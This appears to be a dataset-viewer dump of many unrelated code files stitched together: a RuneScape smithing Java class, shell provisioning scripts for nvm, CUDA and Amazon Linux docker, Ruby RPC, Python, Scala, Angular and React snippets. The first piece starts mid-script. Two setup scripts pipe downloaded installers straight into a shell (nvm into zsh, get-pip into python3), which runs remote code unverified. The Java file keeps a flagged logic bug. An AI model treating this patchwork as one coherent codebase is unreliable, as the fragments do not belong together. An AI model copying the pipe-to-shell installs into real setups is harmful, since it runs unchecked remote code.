important_pods_regex="$(sed '/^[[:space:]]*$/d' <<< "$important_pods_regex" | tr '\n' '|')"
important_pods_regex="${important_pods_regex%|}"

kubectl get pods --all-namespaces -o wide |
grep -Ei "$important_pods_regex"
|
<reponame>lerages/anarchy-source
package org.rs2server.rs2.model.skills.smithing;
import org.rs2server.cache.format.CacheItemDefinition;
import org.rs2server.rs2.Constants;
import org.rs2server.rs2.model.Item;
import java.util.*;
/**
 * Static data tables and helpers for the Smithing skill: forgeable bar
 * definitions, smeltable bar recipes, interface child ids, and the
 * level / bar-amount lookups driving the smithing interface.
 */
public class SmithingUtils {

    /** The hammer item required for forging at an anvil. */
    public static final Item HAMMER = new Item(2347);

    /**
     * A forgeable bar type: bar item id, base Smithing level, the item ids
     * shown on the forging interface (-1 for empty slots), per-tier
     * experience values, and the interface children activated for this bar.
     */
    public enum ForgingBar {
        BRONZE(2349, 0, new int[]{1205, 1277, 1321, 1291, 1307, 1351, 1422, 1337, 1375, -1, 1103, 1075, 1087, 1117, 4819, 1139, 1155, 1173, 1189, -1, -1, 819, 39, 864, 1794, -1, 9375, 9420, 19570, -1, -1, -1}, new double[]{12.5, 25, 37.5, 42.5}, new int[]{66, 82, 210, 267}),
        IRON(2351, 15, new int[]{1203, 1279, 1323, 1293, 1309, 1349, 1420, 1335, 1363, -1, 1101, 1067, 1081, 1115, 4820, 1137, 1153, 1175, 1191, 4540, -1, 820, 40, 863, 7225, -1, 9377, 9423, 19572}, new double[]{25, 30, 55, 57.5}, new int[]{66, 90, 162, 210, 267}),
        STEEL(2353, 30, new int[]{1207, 1281, 1325, 1295, 1311, 1353, 1424, 1339, 1365, -1, 1105, 1069, 1083, 1119, 1539, 1141, 1157, 1177, 1193, 4544, -1, 821, 41, 865, 2370, -1, 9378, 9425, 19574}, new double[]{37.5, 45, 52.5, 67.5}, new int[]{66, 98, 162, 210, 267}),
        MITHRIL(2359, 50, new int[]{1209, 1285, 1329, 1299, 1315, 1355, 1428, 1343, 1369, -1, 1109, 1071, 1085, 1121, 4822, 1143, 1159, 1181, 1197, -1, -1, 822, 42, 866, 9379, 9427, 9416, 9427, 9379, 19576}, new double[]{50, 60, 70, 90}, new int[]{66, 170, 210, 267}),
        ADAMANT(2361, 70, new int[]{1211, 1287, 1331, 1301, 1317, 1357, 1430, 1345, 1371, -1, 1111, 1073, 1091, 1123, 4823, 1145, 1161, 1183, 1199, -1, -1, 823, 43, 867, -1, -1, 9380, 9429, 19578}, new double[]{62.5, 70.5, 78.5, 85.5}, new int[]{66, 210, 267}),
        RUNE(2363, 85, new int[]{1213, 1289, 1333, 1303, 1319, 1359, 1432, 1347, 1373, -1, 1113, 1079, 1093, 1127, 4824, 1147, 1163, 1185, 1201, -1, -1, 824, 44, 868, -1, -1, 9381, 9431, 19580}, new double[]{75, 80, 90, 105.5}, new int[]{66, 210, 267});

        private int barId;               // item id of the bar
        private int[] activatedChildren; // interface children enabled for this bar
        private int[] items;             // item ids shown on the forging interface
        private double[] experience;     // experience per forging tier
        private int baseLevel;           // minimum Smithing level for this bar

        private ForgingBar(int barId, int baseLevel, int[] items, double[] experience, int[] activatedChildren) {
            this.barId = barId;
            this.baseLevel = baseLevel;
            this.items = items;
            this.experience = experience;
            this.activatedChildren = activatedChildren;
        }

        public int[] getItems() {
            return items;
        }

        public int getBaseLevel() {
            return baseLevel;
        }

        public int getBarId() {
            return barId;
        }

        public double[] getExperience() {
            return experience;
        }

        // Lookup from bar item id to its ForgingBar, built once at class load.
        private static Map<Integer, ForgingBar> smithingBars = new HashMap<Integer, ForgingBar>();

        static {
            for (ForgingBar bar : ForgingBar.values()) {
                smithingBars.put(bar.barId, bar);
            }
        }

        /** @return the ForgingBar for the given bar item id, or null. */
        public static ForgingBar forId(int id) {
            return smithingBars.get(id);
        }
    }

    /**
     * A smeltable bar recipe: required Smithing level, experience gained,
     * the ores consumed, and the bar produced.
     */
    public enum SmeltingBar {
        // The primary ore MUST be the first element in the required items array.
        BRONZE(1, 6.2, new Item[]{new Item(436), new Item(438)}, new Item(2349)),
        BLURITE(8, 8.0, new Item[]{new Item(668)}, new Item(9467)),
        IRON(15, 12.5, new Item[]{new Item(440)}, new Item(2351)),
        SILVER(20, 13.7, new Item[]{new Item(442)}, new Item(2355)),
        STEEL(30, 17.5, new Item[]{new Item(440), new Item(453, 2)}, new Item(2353)),
        GOLD(40, 22.5, new Item[]{new Item(444)}, new Item(2357)),
        MITHRIL(50, 30, new Item[]{new Item(447), new Item(453, 4)}, new Item(2359)),
        ADAMANT(70, 37.5, new Item[]{new Item(449), new Item(453, 6)}, new Item(2361)),
        RUNE(85, 50, new Item[]{new Item(451), new Item(453, 8)}, new Item(2363));

        private int levelRequired;
        private double experience;
        private Item[] itemsRequired;
        private Item producedBar;

        private SmeltingBar(int levelRequired, double experience, Item[] itemsRequired, Item producedBar) {
            this.levelRequired = levelRequired;
            this.experience = experience;
            this.itemsRequired = itemsRequired;
            this.producedBar = producedBar;
        }

        /** @return the first SmeltingBar whose required items include the given ore id, or null. */
        public static SmeltingBar of(int ore) {
            for (SmeltingBar bar : SmeltingBar.values()) {
                for (Item item : bar.getItemsRequired()) {
                    if (item.getId() == ore) {
                        return bar;
                    }
                }
            }
            return null;
        }

        public Item[] getItemsRequired() {
            return itemsRequired;
        }

        public int getLevelRequired() {
            return levelRequired;
        }

        public Item getProducedBar() {
            return producedBar;
        }

        public double getExperience() {
            return experience;
        }

        /**
         * Map an interface child id to the smelt amount it represents:
         * 1, 5, 10, or -1 ("X", prompt the player); 0 when unrecognized.
         */
        public int getAmount(int childId) {
            switch (childId) {
                case 16:
                case 20:
                case 24:
                case 28:
                case 32:
                case 36:
                case 40:
                case 44:
                case 48:
                    return 1;
                case 15:
                case 19:
                case 23:
                case 27:
                case 31:
                case 35:
                case 39:
                case 43:
                case 47:
                    return 5;
                case 14:
                case 18:
                case 22:
                case 26:
                case 30:
                case 34:
                case 38:
                case 42:
                case 46:
                    return 10;
                case 13:
                case 17:
                case 21:
                case 25:
                case 29:
                case 33:
                case 37:
                case 41:
                case 45:
                    return -1;
            }
            return 0;
        }
    }

    // Child ids 2..30, filled by the static initializer below.
    public static final int[] CHILD_IDS = new int[29];

    public static final int[] CLICK_OPTIONS =
            {
                    1, 5, 10, 32767
            };

    // Level offsets above the bar's base level, keyed by item-name substring.
    private static Map<String, Integer> levelThreshold = new HashMap<String, Integer>();

    static {
        int counter = 2;
        for (int i = 0; i < CHILD_IDS.length; i++) {
            CHILD_IDS[i] = counter;
            counter += 1;
        }
        levelThreshold.put("dagger", 0);
        levelThreshold.put("sword", 4);
        levelThreshold.put("scimitar", 5);
        levelThreshold.put("longsword", 6);
        levelThreshold.put("2h sword", 14);
        levelThreshold.put("axe", 2);
        levelThreshold.put("mace", 2);
        levelThreshold.put("warhammer", 9);
        levelThreshold.put("battleaxe", 10);
        levelThreshold.put("chainbody", 11);
        levelThreshold.put("platelegs", 16);
        levelThreshold.put("plateskirt", 16);
        levelThreshold.put("platebody", 18);
        levelThreshold.put("nails", 4);
        levelThreshold.put("med helm", 3);
        levelThreshold.put("full helm", 7);
        levelThreshold.put("sq shield", 8);
        levelThreshold.put("kiteshield", 12);
        levelThreshold.put("Oil lantern frame", 11);
        levelThreshold.put("Bullseye lantern (unf)", 19);
        levelThreshold.put("dart tips", 4);
        levelThreshold.put("arrowtips", 5);
        levelThreshold.put("knife", 7);
        levelThreshold.put("javelin heads", 4);
        levelThreshold.put("Iron spit", 2);
        levelThreshold.put("wire", 4);
        levelThreshold.put("bolts", 3);
        levelThreshold.put("limbs", 6);
        levelThreshold.put("grapple tip", 9);
        levelThreshold.put("studs", 6);
    }

    /** Convert a list of SmeltingBar values into an array of their ordinals. */
    public static int[] barToIntArray(List<SmeltingBar> bar) {
        int[] newArray = new int[bar.size()];
        for (int i = 0; i < bar.size(); i++) {
            newArray[i] = bar.get(i).ordinal();
        }
        return newArray;
    }

    /**
     * Level offset above the bar's base level for the given item id,
     * derived from the levelThreshold substring map; 1 when unknown.
     */
    public static int getLevelIncrement(ForgingBar bar, int id) {
        if (id == -1) {
            return 1;
        }
        String name = CacheItemDefinition.get(id).getName();
        for (Map.Entry<String, Integer> entry : levelThreshold.entrySet()) {
            if (name.contains(entry.getKey())) {
                int increment = entry.getValue();
                if (name.contains("dagger") && bar != ForgingBar.BRONZE) {
                    increment--;
                    // NOTE(review): '&&' binds tighter than '||' here, so this
                    // branch also fires for EVERY rune-bar item regardless of
                    // whether its name contains "hatchet" -- confirm whether
                    // the intended condition was
                    // name.contains("hatchet") && (bar == BRONZE || bar == RUNE).
                } else if (name.contains("hatchet") && bar == ForgingBar.BRONZE || bar == ForgingBar.RUNE) {
                    increment--;
                }
                if (bar == ForgingBar.RUNE && increment > 14) {
                    increment -= 4;
                }
                return increment;
            }
        }
        System.out.println(name + " hasn't been added to the level increment map!");
        return 1;
    }

    /** Number of items produced per forging action for the given item id. */
    public static int getItemAmount(int id) {
        String name = CacheItemDefinition.get(id).getName();
        if (name.contains("knife") || name.contains("javelin heads")) {
            return 5;
        } else if (name.contains("bolts") || name.contains("dart tip")) {
            return 10;
        } else if (name.contains("arrowtips") || name.contains("nails")) {
            return 15;
        }
        return 1;
    }

    /**
     * Number of bars consumed to forge the given item, based on how far its
     * required level sits above the bar's base level and on the item name.
     */
    public static int getBarAmount(int levelRequired, ForgingBar bar, int id) {
        if (levelRequired >= 99) {
            levelRequired = 99;
        }
        int level = levelRequired - bar.baseLevel;
        String name = CacheItemDefinition.get(id).getName().toLowerCase();
        // System.out.println("Level: " + level + ", Name: " + name);
        if (level >= 0 && level <= 4) {
            if (name.contains("battleaxe") || name.contains("2h sword")) {
                return 3;
            } else if (name.contains("longsword")) {
                return 2;
            }
            return 1;
        } else if (level > 4 && level <= 8) {
            if (name.contains("knife") || name.contains("arrowtips") || name.contains("dart tips") || name.contains("limb") || name.contains("studs")) {
                return 1;
            }
            return 2;
        } else if (level >= 9 && level <= 16) {
            if (name.contains("grapple")) {
                return 1;
            } else if (name.contains("claws")) {
                return 2;
            } else if (name.contains("platebody")) {
                return 5;
            }
            return 3;
        } else if (level >= 17) {
            if (name.contains("bullseye")) {
                return 1;
            }
            return 5;
        }
        return 1;
    }
}
|
#!/usr/bin/env zsh
# install nvm
# NOTE(review): piping the installer straight into zsh executes remote code
# unverified; pin/checksum the script if this runs in CI.
curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.34.0/install.sh | zsh
# reload the shell config so the nvm function is available in this session
. ~/.zshrc
# install and default to Node 10, then install the Babel CLI globally
nvm install 10.16.0
nvm alias default 10
npm install -g babel-cli
|
# Provision an Ubuntu box: ffmpeg + a Python venv with the project deps,
# fetch the pretrained checkpoint from Google Drive, then install CUDA.
# NOTE(review): no `set -e` here, so a failed step does not stop the script.
sudo apt update
sudo apt --assume-yes install ffmpeg python3-venv
python3 -m venv venvgen
source venvgen/bin/activate
python -m pip install wheel
python -m pip install -r requirements-latest.txt
python -m pip install requests
# Helper repo for downloading public Google Drive files by id.
git clone https://github.com/chentinghao/download_google_drive.git
FILEID="1Z1dc_gQSmafDeWgqRxTJwsDhT7C7g8XF"
FILEPATH="config/vox-adv-cpk.pth.tar"
python download_google_drive/download_gdrive.py $FILEID $FILEPATH
# Install NVIDIA's CUDA 10.0 repo package and the drivers (Ubuntu 16.04 repo).
CUDA_REPO_PKG=cuda-repo-ubuntu1604_10.0.130-1_amd64.deb
wget -O /tmp/${CUDA_REPO_PKG} https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1604/x86_64/${CUDA_REPO_PKG}
sudo dpkg -i /tmp/${CUDA_REPO_PKG}
sudo apt-key adv --fetch-keys https://developer.download.nvidia.com/compute/cuda/repos/ubuntu1604/x86_64/7fa2af80.pub
rm -f /tmp/${CUDA_REPO_PKG}
sudo apt-get update
sudo apt-get --assume-yes install cuda-drivers
sudo apt-get --assume-yes install cuda
module EMRPC
# ReconnectingPid collects all messages in the backlog buffer and tries to reconnect.
# Calls self.on_raise() with the following exceptions:
#   * BacklogError  - backlog grew beyond :max_backlog messages
#   * AttemptsError - more than :max_attempts consecutive failed connects
#   * TimeoutError  - no connection re-established within :timeout seconds
#
class ReconnectingPid
  include Pid

  DEFAULT_MAX_BACKLOG  = 256
  DEFAULT_MAX_ATTEMPTS = 5
  DEFAULT_TIMEOUT      = 5 # sec.
  DEFAULT_TIMER        = Timers::EVENTED

  # Arguments:
  #   address       Address if a pid or the pid itself to connect to.
  #
  # Options:
  #   :max_backlog  Maximum backlog size. BacklogError is raised when backlog becomes larger than
  #                 the specified size. Default is 256 messages.
  #
  #   :max_attempts Maximum number of connection attempts. AttemptsError is raised when this number is exceeded.
  #                 Counter is set to zero after each successful connection. Default is 5 attempts.
  #
  #   :timeout      Time interval in seconds. TimeoutError is raised when connection was not established
  #                 in the specified amount of time. Default is 5 seconds.
  #
  #   :timer        Proc which runs a periodic timer. Default is Timers::EVENTED. See EMRPC::Timers for more info.
  #
  def initialize(address, options = {})
    super(address, options)
    @address = address

    # Options
    @max_backlog  = options[:max_backlog]  || DEFAULT_MAX_BACKLOG
    @max_attempts = options[:max_attempts] || DEFAULT_MAX_ATTEMPTS
    @timeout      = options[:timeout]      || DEFAULT_TIMEOUT
    @timer        = options[:timer]        || DEFAULT_TIMER

    # Gentlemen, start your engines!
    @attempts = 1
    @backlog = Array.new
    # Timer fires at least every second so the two-phase timeout below works.
    @timeout_thread = @timer.call([ @timeout, 1 ].max, method(:timer_action))
    connect(address)
  end

  # Forward to the remote pid when connected, otherwise buffer the message.
  def send(*args)
    if rpid = @rpid
      rpid.send(*args)
    else
      @backlog.push(args)
      if @backlog.size > @max_backlog
        on_raise(self, BacklogError.new("Backlog exceeded maximum size of #{@max_backlog} messages"))
      end
    end
  end

  # Drain the backlog by re-sending each buffered message.
  def flush!
    while args = @backlog.shift
      send(*args)
    end
  end

  # Connection callback: remember the remote pid, reset attempts, drain backlog.
  def connected(rpid)
    @rpid = rpid
    @attempts = 1
    flush!
  end

  # Disconnection callback: drop the remote pid and reconnect unless killed.
  def disconnected(rpid)
    @rpid = nil
    connect(@address) unless killed?
  end

  # Failed-connect callback: count the attempt, raise past the limit, retry.
  def connection_failed(conn)
    a = (@attempts += 1)
    if a > @max_attempts
      on_raise(self, AttemptsError.new("Maximum number of #{@max_attempts} connecting attempts exceeded"))
    end
    connect(@address)
  end

  # Periodic tick: first disconnected tick arms the timeout, the second
  # (still disconnected) tick raises TimeoutError; any connected tick disarms.
  def timer_action
    if @rpid
      @state = nil
      return
    end
    if @state == :timeout
      @state = nil
      on_raise(self, TimeoutError.new("Failed to reconnect with #{@timeout} sec. timeout"))
    else
      @state = :timeout
    end
  end

  class ReconnectingError < StandardError; end
  class BacklogError     < ReconnectingError; end
  class AttemptsError    < ReconnectingError; end
  class TimeoutError     < ReconnectingError; end
end # ReconnectingPid
end # EMRPC
|
#!/bin/bash
# Wrapper that runs the `play` binary against the project's word-game board,
# letting the caller prefix a launcher (e.g. a profiler) via "$@".
set -eo pipefail

SCRIPT_DIR=$(cd "$(dirname "$0")"; pwd)

# First argument is the project root; remaining arguments wrap the command.
PROJECT_DIR=$1
shift

"$@" ./src/play/play \
    RE_YPDO \
    "${SCRIPT_DIR}/tiles.txt" \
    "${PROJECT_DIR}/boards/wwf_challenge.txt"
|
#!/bin/bash
# Bootstrap an Amazon Linux 2 host: base packages, docker, docker-compose,
# a custom daemon DNS config, and docker group membership for SSM/EC2 users.
set -euo pipefail

yum update -y && yum upgrade -y
yum install -y \
    amazon-ecr-credential-helper \
    amazon-cloudwatch-agent \
    docker-19.03.13ce-1.amzn2 \
    gcc \
    gcc-c++ \
    git \
    jq \
    patch \
    htop \
    tmux \
    bcc-tools \
    python3

curl -sSL https://bootstrap.pypa.io/get-pip.py | python3
pip3 install --no-cache-dir PyYAML docker-compose

# Configure the docker daemon DNS instead of relying on the default.
# Fixed: dockerd reads /etc/docker/daemon.json (the previous docker.json was
# silently ignored), and the old content carried a trailing comma, which is
# invalid JSON and would have prevented the daemon from starting.
mkdir -p /etc/docker
cat << EOF > /etc/docker/daemon.json
{
    "dns": ["169.254.169.253"]
}
EOF

# Start and configure docker
service docker start
systemctl enable docker

# add ssm-user and ec2-user to docker group for convenience
usermod -aG docker ssm-user
usermod -aG docker ec2-user
import numpy as np
from sklearn import svm

# Load the data
# Assumes images.npy holds flattened feature vectors and labels.npy the
# matching class labels -- TODO confirm against the data-preparation step.
X = np.load('images.npy')
Y = np.load('labels.npy')

# Create the model
model = svm.SVC(kernel='linear')

# Train the model
model.fit(X, Y)
#!/bin/bash
# Build each LLVM pass directory in sequence with a parallel make.
# NOTE(review): no `set -e`, so a failed make does not abort the remaining
# builds; also the comments below do not all match their directory names --
# confirm the intended pass/directory mapping.

# Run make inside the given pass directory, using all available cores.
function build_pass {
    pass_dir="$1"
    echo "Building pass: $pass_dir"
    pushd "$pass_dir"
    make -j $(nproc)
    popd
}

# Idempotent regions pass (checkpoint placement)
build_pass "idempotent-expander"

# Write buffering pass (Write Clusterer)
build_pass "write-buffering"

# Loop scheduler (Loop Write Clusterer)
build_pass "loop-scheduler"

# Idempotent expander (Expander)
build_pass "idempotent-regions"
def classify_points(point, polygon):
    """Classify a 2D point against a polygon using ray casting (even-odd rule).

    point   : (x, y) pair.
    polygon : sequence of (x, y) vertices in order (closed implicitly).
    Returns "inside" or "outside".

    Fixed: the original parity condition used a raw cross-product comparison
    whose sign flips with edge direction, so points were misclassified for
    edges traversed "downward"; this uses the standard straddle-and-crossing
    test instead.
    """
    x, y = point[0], point[1]
    is_inside = False
    n = len(polygon)
    for i in range(n):
        p1 = polygon[i]
        p2 = polygon[(i + 1) % n]
        # Count the edge only if it straddles the horizontal ray through y
        # (strict on one side, so shared vertices are not double-counted).
        if (p1[1] > y) != (p2[1] > y):
            # x-coordinate where the edge crosses the ray.
            x_cross = (p2[0] - p1[0]) * (y - p1[1]) / (p2[1] - p1[1]) + p1[0]
            if x < x_cross:
                is_inside = not is_inside
    return "inside" if is_inside else "outside"
<reponame>ngochai94/laminext<gh_stars>0
package io.laminext.site
/** Substitutes `{{name}}` placeholders in a string with the values below. */
object TemplateVars {

  val vars = Seq(
    "laminextVersion" -> "0.12.0"
  )

  /** Replace every known `{{name}}` placeholder occurring in `s`. */
  def apply(s: String): String = {
    var rendered = s
    for ((name, value) <- vars) {
      rendered = rendered.replace(s"{{${name}}}", value)
    }
    rendered
  }

}
|
import { BrowserModule } from '@angular/platform-browser';
import { NgModule } from '@angular/core';
import { FormsModule } from '@angular/forms';
import {environment} from '../environments/environment';
import {BrowserAnimationsModule} from '@angular/platform-browser/animations';
import { AppComponent } from './app.component';
import { NgIf } from '@angular/common';
import {NgForOf} from '@angular/common';
import {routing, appRoutingProviders} from './app.routing';
import {HttpModule} from '@angular/http';
import { HttpClientModule } from '@angular/common/http';
import { GooglePlaceModule } from "ngx-google-places-autocomplete";
import {chart} from 'chart.js';
import { JwtHelper } from 'angular2-jwt';
import {DataTableModule} from "angular2-datatable";
import {DataFilterPipe} from './components/filter/data-filter-pipe';
import {ToastModule} from 'ng2-toastr/ng2-toastr';
import { ModalModule } from 'ngx-modialog';
import { BootstrapModalModule } from 'ngx-modialog/plugins/bootstrap';
import { Ng4LoadingSpinnerModule } from 'ng4-loading-spinner';
import {AngularFireModule} from 'angularfire2';
import {AngularFireDatabaseModule} from 'angularfire2/database';
import { AmChartsModule } from "@amcharts/amcharts3-angular";
import { CKEditorModule } from 'ng2-ckeditor';
import { AngularFirestoreModule } from 'angularfire2/firestore';
import {OperationService} from './components/service/operation.service';
import {DashboardService} from './components/service/dashboard.service';
import { AuthenticateService } from './components/service/authenticate.service';
import { ChequeService } from './components/service/cheque.service';
import { ChangeService } from './components/service/change.service';
import {CompteService} from './components/service/compte.service';
import {EmailService} from './components/service/email.service';
import {ProfileService} from './components/service/profile.service';
import {TaskService} from './components/service/task.service';
import {LoginComponent} from './components/login/login.component';
import {NavbarComponent} from './components/navbar/navbar.component';
import {DashboardComponent} from './components/dashboard/dashboard.component';
import {OperationComponent} from './components/operation/operation.component';
import {ChequeComponent} from './components/cheque/cheque.component';
import {ChangeComponent} from './components/change/change.component';
import {EmailComponent} from './components/email/email.component';
import {InboxComponent} from './components/email/inbox/inbox.component';
import {TacheComponent} from './components/tache/tache.component';
import {SentComponent} from './components/email/sent/sent.component';
import { MessageComponent} from './components/email/message/message.component';
import {DraftComponent} from './components/email/draft/draft.component';
import {DeletedComponent} from './components/email/deleted/deleted.component';
import {TrashComponent} from './components/email/trash/trash.component';
import {TrashModifiedComponent} from './components/email/tashModified/trashModified.component';
import {DeletedModifiedComponent} from './components/email/deletedModified/deletedModified.component';
import {ProfileComponent} from './components/profile/profile.component';
import { SpinnerComponent } from './components/filter/spinner.component';
import {ChatComponent} from './components/chat/chat.component';
/**
 * Root Angular module: declares every component/pipe, wires up the
 * third-party modules (Firebase, toastr, modals, spinner, charts,
 * CKEditor, Google Places, data tables) and registers the app-wide
 * services and routing providers.
 */
@NgModule({
  // Components and pipes owned by this module.
  declarations: [
    SpinnerComponent,
    AppComponent,
    LoginComponent,
    DashboardComponent,
    NavbarComponent,
    OperationComponent,
    ChequeComponent,
    ChangeComponent,
    EmailComponent,
    InboxComponent,
    SentComponent,
    MessageComponent,
    DraftComponent,
    DeletedComponent,
    TrashComponent,
    TrashModifiedComponent,
    DeletedModifiedComponent,
    TacheComponent,
    ProfileComponent,
    ChatComponent,
    DataFilterPipe
  ],
  // Angular and third-party modules this app depends on.
  imports: [
    BrowserModule,
    routing,
    HttpModule,
    FormsModule,
    HttpClientModule,
    DataTableModule,
    BrowserAnimationsModule,
    ToastModule.forRoot(),
    ModalModule.forRoot(),
    BootstrapModalModule,
    Ng4LoadingSpinnerModule.forRoot(),
    // Firebase is configured from the environment file.
    AngularFireModule.initializeApp(environment.config),
    AngularFireDatabaseModule,
    AmChartsModule,
    CKEditorModule,
    GooglePlaceModule,
    AngularFirestoreModule
  ],
  // Singleton services injected throughout the app.
  providers: [
    appRoutingProviders,
    JwtHelper,
    NgIf,
    NgForOf,
    AuthenticateService,
    OperationService,
    DashboardService,
    CompteService,
    ChequeService,
    ChangeService,
    EmailService,
    ProfileService,
    TaskService
  ],
  bootstrap: [AppComponent]
})
export class AppModule { }
|
<gh_stars>100-1000
def call_callable(f, x=None):
    """Call *f* with no arguments when *x* is None, otherwise with str(x)."""
    return f() if x is None else f(str(x))
def test_ruby_object_attr(ro):
    # Exercise an attribute-style zero-argument call on the wrapped object.
    return ro.attr()
def test_ruby_object_method(ro):
    # Exercise a one-argument method call on the wrapped object.
    return ro.smethod(42)
|
import React, { Component } from 'react';
class UserList extends Component {
constructor(props) {
super(props);
this.state = {
userList: props.userList
};
}
render() {
return (
<ul>
{this.state.userList.map((user, index) => (
<li key={index}>
{user.name}: <a href={user.profileURL}>Profile</a>
</li>
))}
</ul>
);
}
}
export default UserList; |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.